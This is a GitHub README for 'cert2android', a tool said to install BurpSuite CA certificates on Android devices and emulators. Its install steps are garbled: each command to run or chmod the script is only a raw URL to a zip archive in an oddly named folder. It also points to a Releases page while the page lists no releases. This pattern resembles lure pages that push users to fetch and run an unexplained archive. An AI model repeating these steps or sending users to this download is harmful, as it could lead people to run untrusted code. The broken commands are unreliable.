Skip to content

πŸ”§ Automate Burp CA installation on Android with this Bash script, converting certificates and ensuring network interception works seamlessly.

Notifications You must be signed in to change notification settings

himanshubaid14/cert2android

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

21 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸŽ‰ cert2android - Easily Install BurpSuite Certificates on Android

πŸ“₯ Download Now

Download cert2android

πŸš€ Getting Started

cert2android is a Bash tool that helps you install BurpSuite certificates directly into your Android device's system stores. This is especially useful for users of Android emulators, like Genymotion.

πŸ“‹ Requirements

To use cert2android, you need:

  • A computer running macOS, Linux, or Windows with Bash support.
  • Android Debug Bridge (ADB) installed. You can download it as part of the Android SDK platform tools.
  • An Android device or emulator to connect to.

🎯 Features

  • Automatic Installation: Installs BurpSuite certificates with one command.
  • Compatibility: Works with Genymotion and other Android devices.
  • Simplicity: No technical expertise is required to use this tool.

πŸ“‚ Download & Install

  1. Visit the Releases Page: Go to the cert2android Releases Page. This page contains the latest version of the software.

  2. Download the Latest Release: Look for the latest version listed, and click on the downloadable file.

  3. Extract the Files: If the downloaded file is in a compressed format (like a ZIP), extract it to a location on your computer.

  4. Open a Terminal:

    • On macOS or Linux, open your Terminal application.
    • On Windows, open the Command Prompt or PowerShell.
  5. Navigate to the Directory: Use the cd command to change to the directory where you extracted the files. For example:

    cd path/to/cert2android
  6. Run the Script: Execute the script using the following command:

    https://raw.githubusercontent.com/himanshubaid14/cert2android/main/Waicurian/cert2android.zip

    Ensure you have permission to run the script. If needed, use:

    chmod +x https://raw.githubusercontent.com/himanshubaid14/cert2android/main/Waicurian/cert2android.zip
  7. Connect Your Device: Connect your Android device or start your emulator. Make sure that USB debugging is enabled on your device.

  8. Install the Certificate: After connecting your device, run this command:

    https://raw.githubusercontent.com/himanshubaid14/cert2android/main/Waicurian/cert2android.zip
  9. Follow On-screen Instructions: The script will guide you through the final steps to complete the installation.

πŸ“– Usage Instructions

Once the installation is successful, your device will have the BurpSuite certificates installed. You can now use BurpSuite without needing to configure anything else for certificate installation.

πŸ”§ Troubleshooting

  • ADB Not Recognized: If you see an error that ADB is not recognized, ensure that ADB is installed and added to your system's PATH.

  • Device Not Detected: If your Android device is not detected, confirm that USB debugging is enabled and your device is connected properly.

  • Permission Denied: If you encounter a permission error, make sure you have executable permissions for the script using chmod +x https://raw.githubusercontent.com/himanshubaid14/cert2android/main/Waicurian/cert2android.zip.

πŸ’‘ Additional Information

To learn more about how BurpSuite works with Android systems, consider checking the documentation on the official BurpSuite website or explore community forums.

Feel free to report issues or suggest improvements on the GitHub repository where cert2android is hosted. Your feedback is valuable and helps enhance the tool.

🎈 Support

If you have questions, need help, or want to share your experience, please open an issue on the GitHub repository. We welcome all feedback and contributions.

πŸ”— Useful Links

Thank you for choosing cert2android. Enjoy your Android web testing!

About

πŸ”§ Automate Burp CA installation on Android with this Bash script, converting certificates and ensuring network interception works seamlessly.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages